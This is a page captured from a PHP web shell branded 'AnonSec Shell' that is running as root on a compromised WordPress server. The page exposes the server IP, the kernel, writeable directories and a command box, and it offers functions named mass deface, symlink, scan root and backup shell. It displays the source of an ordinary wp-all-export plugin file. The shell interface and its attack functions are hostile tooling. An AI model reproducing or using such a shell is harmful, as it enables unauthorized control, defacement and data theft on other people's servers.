AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.144.45.61   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wp-all-export/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wp-all-export/wpae_api.php
<?php

// Let's bootstrap
function wpae_api() {

    if ( ! check_ajax_referer( 'wp_all_export_secure', 'security', false )){
        exit( json_encode(array('html' => __('Security check', 'wp_all_export_plugin'))) );
    }

    if ( ! current_user_can( \PMXE_Plugin::$capabilities ) ){
        exit( json_encode(array('html' => __('Security check', 'wp_all_export_plugin'))) );
    }

    $container = new \Wpae\Di\WpaeDi(array());

    $request = new \Wpae\Http\Request(file_get_contents('php://input'));

    $q = $_GET['q'];
    $routeParts = explode('/', $q);
    $controller = 'Wpae\\App\\Controller\\'.ucwords($routeParts[0]).'Controller';
    $action = ucwords($routeParts[1]).'Action';

    $controller = new $controller($container);
    $response = $controller->$action($request);

    if(!$response instanceof \Wpae\Http\Response) {
        throw new Exception('The controller must return an HttpResponse instance.');
    }

    $response->render();
}

add_action( 'wp_ajax_wpae_api', 'wpae_api' );

Anon7 - 2022
AnonSec Team